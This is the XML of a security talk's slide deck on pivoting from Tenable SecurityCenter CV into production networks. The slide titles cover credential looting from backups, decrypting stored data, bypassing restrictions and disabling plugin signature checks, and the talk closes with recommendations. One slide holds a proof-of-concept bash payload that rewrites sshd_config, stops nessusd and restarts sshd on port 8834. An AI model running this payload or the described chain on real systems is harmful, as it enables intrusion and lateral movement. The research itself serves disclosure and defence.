              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2595496 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 592066 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2631056 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 627626 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2631056 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 627626 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2631056 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 627626 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2631056 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 627626 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2631056 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 627626 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2671696 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 693666 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2671696 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 693666 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3395680"/>
              <a:gd name="connsiteY0" fmla="*/ 1204692 h 1204692"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3395680"/>
              <a:gd name="connsiteY1" fmla="*/ 1089906 h 1204692"/>
              <a:gd name="connsiteX2" fmla="*/ 2671696 w 3395680"/>
              <a:gd name="connsiteY2" fmla="*/ 764786 h 1204692"/>
              <a:gd name="connsiteX3" fmla="*/ 3395680 w 3395680"/>
              <a:gd name="connsiteY3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5680" h="1204692">
                <a:moveTo>
                  <a:pt x="0" y="1204692"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="241236" y="1196568"/>
                  <a:pt x="918313" y="1179310"/>
                  <a:pt x="1437256" y="1089906"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1956199" y="1000502"/>
                  <a:pt x="2326348" y="948236"/>
                  <a:pt x="2671696" y="764786"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2991552" y="579072"/>
                  <a:pt x="3141864" y="343194"/>
                  <a:pt x="339568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20000" y="1765785"/>
            <a:ext cx="645796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8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67" y="378366"/>
            <a:ext cx="6202109" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on Port 8834: Payload (POC)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3425371"/>
            <a:ext cx="8123844" cy="875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40000" y="1081326"/>
            <a:ext cx="8076176" cy="161582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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#/bin/bash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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 's/^\#Port\ 22/Port\ 22/' /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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ssh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sshd_config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="376076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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'Port 8834' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tee --append /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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ssh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sshd_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; /dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nessusd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stop &gt; /dev/null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376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while [ "$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ltn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep 8834)" != "" ]; do sleep 1; done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kill -HUP $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr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sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep -v 'grep' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="376076"/>
                </a:solidFill>
              </a:rPr>
              <a:t> '{print $2}')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11670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72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in all</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Content Placeholder 6"/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1344168" y="378366"/>
            <a:ext cx="7114032" cy="4118980"/>
          </a:xfr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655" y="3486361"/>
            <a:ext cx="383231" cy="3702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698" y="1869005"/>
            <a:ext cx="619808" cy="3949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805" y="2822984"/>
            <a:ext cx="613463" cy="3908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136" y="3190850"/>
            <a:ext cx="438264" cy="3271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600" y="3532723"/>
            <a:ext cx="678239" cy="3238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412" y="3862874"/>
            <a:ext cx="613463" cy="3908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188" y="2426753"/>
            <a:ext cx="595789" cy="2845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502" y="3981782"/>
            <a:ext cx="442107" cy="3300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572" y="3973574"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="3300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9083" y="2879375"/>
            <a:ext cx="488862" cy="3114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34736" y="3667989"/>
            <a:ext cx="602299" cy="339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43713" y="3667989"/>
            <a:ext cx="602299" cy="3393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34736" y="3667989"/>
            <a:ext cx="602299" cy="3393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43712" y="3667989"/>
            <a:ext cx="602299" cy="3393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50333" y="3663827"/>
            <a:ext cx="602299" cy="3393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10405" y="878503"/>
            <a:ext cx="602299" cy="3393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71147" y="1948107"/>
            <a:ext cx="602299" cy="3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3 C -0.00191 0.00617 -0.01354 0.02098 -0.01753 0.03364 C -0.02205 0.04537 -0.02118 0.05709 -0.02396 0.07407 C -0.02882 0.09629 -0.02899 0.11327 -0.02899 0.13611 C -0.04114 0.16296 -0.0526 0.15277 -0.08993 0.16759 C -0.10816 0.17716 -0.15382 0.16172 -0.17552 0.16759 C -0.19739 0.17283 -0.20937 0.20462 -0.22309 0.20802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0494E-6 C 0.00486 0.00401 0.02223 -0.03982 0.05313 -0.03642 C 0.08421 -0.03303 0.1606 -0.02624 0.18612 0.02068 C 0.18091 0.04259 0.18264 0.28241 0.18264 0.30586 C 0.19323 0.33796 0.24306 0.325 0.25886 0.33364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path" presetSubtype="0" accel="33333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24 C 0.00729 -0.00062 -0.02882 -0.04661 -0.0309 -0.08241 C -0.03316 -0.11852 -0.04132 -0.22562 -0.01337 -0.21667 C -0.00677 -0.22408 0.03368 -0.21667 0.03663 -0.20494 C 0.04896 -0.15494 0.03455 -0.10031 0.04271 -0.06945 C 0.03941 -0.0179 0.07309 -0.03488 0.0842 -0.02068 C 0.09531 -0.00618 0.1007 0.05216 0.10903 0.06111 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="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-78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accel="33333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34568E-6 C 0.0073 2.34568E-6 -0.02882 -0.04599 -0.0309 -0.08179 C -0.03316 -0.1179 -0.04132 -0.225 -0.01336 -0.21605 C 0.00695 -0.2358 0.0665 -0.21327 0.09063 -0.20062 C 0.10174 -0.18611 0.11754 -0.14753 0.12674 -0.13858 " pathEditMode="relative" rAng="0" ptsTypes="AAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="2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1120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0" presetClass="path" presetSubtype="0" accel="33333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34568E-6 C 0.00712 2.34568E-6 -0.02882 -0.0463 -0.0309 -0.0821 C -0.02969 -0.10864 -0.03698 -0.17963 -0.02517 -0.20432 C -0.01337 -0.22901 0.03386 -0.19383 0.03993 -0.22994 C 0.05209 -0.27871 0.03525 -0.34815 0.04254 -0.375 C 0.04965 -0.40185 0.07153 -0.39198 0.08264 -0.39136 C 0.09323 -0.38889 0.10261 -0.38148 0.11059 -0.37068 C 0.11858 -0.35988 0.12674 -0.33241 0.13108 -0.32685 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="3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969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0" presetClass="path" presetSubtype="0" accel="33333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34568E-6 C 0.00799 2.34568E-6 -0.02795 -0.04753 -0.03003 -0.08334 C -0.02882 -0.11019 -0.05277 -0.21513 -0.0092 -0.21605 L 0.20296 -0.20895 C 0.24358 -0.21698 0.2566 -0.21759 0.27032 -0.20432 C 0.28386 -0.19136 0.27969 -0.13611 0.28507 -0.13087 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="3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40068" y="378366"/>
            <a:ext cx="3685568" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Deployment of Tenable Products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640080" y="878503"/>
            <a:ext cx="7668873" cy="3654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4663440"/>
            <a:ext cx="33586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900" dirty="0"/>
              <a:t>Source: https://vshow.on24.com/vshow/TenableNetworkSecur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="777699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endParaRPr lang="nb-NO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2558795"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="540000" y="674556"/>
          <a:ext cx="8056858" cy="389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528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0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Corporate Network Infrastructure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1345163" y="378367"/>
            <a:ext cx="7113146" cy="4096772"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337422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40067" y="378366"/>
            <a:ext cx="2457133" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Deployment of SecurityCenter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Content Placeholder 14"/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1345163" y="378367"/>
            <a:ext cx="7113146" cy="409677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5303" y="3117112"/>
            <a:ext cx="383231" cy="370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698" y="1869005"/>
            <a:ext cx="619808" cy="3949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8621" y="2800667"/>
            <a:ext cx="613463" cy="390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136" y="3190850"/>
            <a:ext cx="438264" cy="327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600" y="3532723"/>
            <a:ext cx="678239" cy="3238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412" y="3862874"/>
            <a:ext cx="613463" cy="3908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188" y="2426753"/>
            <a:ext cx="595789" cy="2845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502" y="3981782"/>
            <a:ext cx="442107" cy="3300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572" y="3973574"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="3300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9083" y="2879375"/>
            <a:ext cx="488862" cy="3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69136E-6 L -0.13385 0.0675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Credential Loot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70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40068" y="378366"/>
            <a:ext cx="3006696" cy="1000274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Backing up SecurityCenter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586268"/>
            <a:ext cx="7961774" cy="21821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" y="4663440"/>
            <a:ext cx="4572000" cy="2286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900" dirty="0"/>
              <a:t>Source: https://docs.tenable.com/sccv/5_4/Content/UpgradingSecurityCenter.htm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001" y="3283528"/>
            <a:ext cx="7961773" cy="554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66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Backups of SecurityCenter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1344168" y="378366"/>
            <a:ext cx="7114032" cy="4118980"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Plassholder for lysbildenummer 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="4765664"/>
            <a:ext cx="180000" cy="9233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defRPr sz="600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="698898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6E8B7-50FC-48D4-B5AD-275A23A4E85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655" y="3486361"/>
            <a:ext cx="383231" cy="370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698" y="1869005"/>
            <a:ext cx="619808" cy="3949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805" y="2822984"/>
            <a:ext cx="613463" cy="390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136" y="3190850"/>
            <a:ext cx="438264" cy="3271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600" y="3532723"/>
            <a:ext cx="678239" cy="323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412" y="3862874"/>
            <a:ext cx="613463" cy="3908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188" y="2426753"/>
            <a:ext cx="595789" cy="2845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502" y="3981782"/>
            <a:ext cx="442107" cy="3300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572" y="3973574"/>
            <a:ext cx="613463" cy="3908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6062" y="2866579"/>
            <a:ext cx="442107" cy="330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9083" y="2879375"/>
            <a:ext cx="488862" cy="311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18548" y="744126"/>
            <a:ext cx="602299" cy="3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4198E-7 C 0.00365 0.00093 0.01632 8.64198E-7 0.02466 0.00432 C 0.03299 0.00833 0.0448 0.00802 0.05 0.02654 C 0.0592 0.03981 0.05486 0.09907 0.0533 0.12346 C 0.03855 0.15 0.04514 0.16173 0.01424 0.18117 C -0.00468 0.19815 -0.0658 0.18518 -0.0927 0.19197 C -0.11961 0.19846 -0.12725 0.24815 -0.13923 0.25185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VRY">
  <a:themeElements>
    <a:clrScheme name="Evry">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="376076"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="9BAFBA"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="063954"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FF9800"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F52882"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="7028B7"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="00C8C8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6EBE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>
          <a:lnSpc>
            <a:spcPts val="1800"/>
          </a:lnSpc>
          <a:defRPr kumimoji="0" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:srgbClr val="376076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vry_PPT_clean.potx" id="{C8FD440A-AC4C-4D6B-AA70-2B9BD873B574}" vid="{28832D68-64E4-480A-92C7-D5FEF45FE3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EVRY_Template_Widesceen</Template>
  <TotalTime>6657</TotalTime>
  <Words>2001</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>356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Courier New</vt:lpstr>
      <vt:lpstr>EVRY</vt:lpstr>
      <vt:lpstr>Jumping from Tenable's SecurityCenter CV to production environments</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>What is SecurityCenter CV?</vt:lpstr>
      <vt:lpstr>Deployment of Tenable Products</vt:lpstr>
      <vt:lpstr>Typical Corporate Network Infrastructure</vt:lpstr>
      <vt:lpstr>Deployment of SecurityCenter</vt:lpstr>
      <vt:lpstr>Credential Loot</vt:lpstr>
      <vt:lpstr>Backing up SecurityCenter</vt:lpstr>
      <vt:lpstr>Backups of SecurityCenter</vt:lpstr>
      <vt:lpstr>Run Backup Files on Centos</vt:lpstr>
      <vt:lpstr>Getting Access to SecurityCenter from Backup Files</vt:lpstr>
      <vt:lpstr>Moving to DMZ</vt:lpstr>
      <vt:lpstr>Structure of an Organization</vt:lpstr>
      <vt:lpstr>/opt/sc/orgs/[orgID]/organization.db</vt:lpstr>
      <vt:lpstr>/opt/sc/orgs/[orgID]/uploads/</vt:lpstr>
      <vt:lpstr>Decryption of Encrypted Data</vt:lpstr>
      <vt:lpstr>Current Picture of Known Credentials </vt:lpstr>
      <vt:lpstr>/opt/sc/application.db</vt:lpstr>
      <vt:lpstr>/opt/sc/application.db (contiue)</vt:lpstr>
      <vt:lpstr>/opt/sc/application.db (contiue)</vt:lpstr>
      <vt:lpstr>Current Picture of Known Credentials </vt:lpstr>
      <vt:lpstr>Improved Security of SecurityCenter CV </vt:lpstr>
      <vt:lpstr>Creating Custom Log Files</vt:lpstr>
      <vt:lpstr>Find Built-in Debug Files</vt:lpstr>
      <vt:lpstr>Preparations</vt:lpstr>
      <vt:lpstr>Analyzing debug.scan</vt:lpstr>
      <vt:lpstr>Lateral Movement</vt:lpstr>
      <vt:lpstr>Starting Point DMZ</vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Audit File</vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Restrictions</vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Bypassing Restrictions  </vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Payload (POC)</vt:lpstr>
      <vt:lpstr>Moving to Restricted Zone</vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Custom Plugin</vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Create Custom Feed</vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Disable Signature Check </vt:lpstr>
      <vt:lpstr>Enable sshd on Port 8834: Payload (POC)</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>All in all</vt:lpstr>
      <vt:lpstr>Recommendations</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>EVRY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Oleksandr Kazymyrov</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Oleksandr Kazymyrov</cp:lastModifiedBy>
  <cp:revision>219</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-05T11:49:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-02T06:12:15Z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ef85ea-3e38-424b-a536-85f7ca35fb6d_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_2fef85ea-3e38-424b-a536-85f7ca35fb6d_SiteId">
    <vt:lpwstr>40cc2915-e283-4a27-9471-6bdd7ca4c6e1</vt:lpwstr>
  </property>
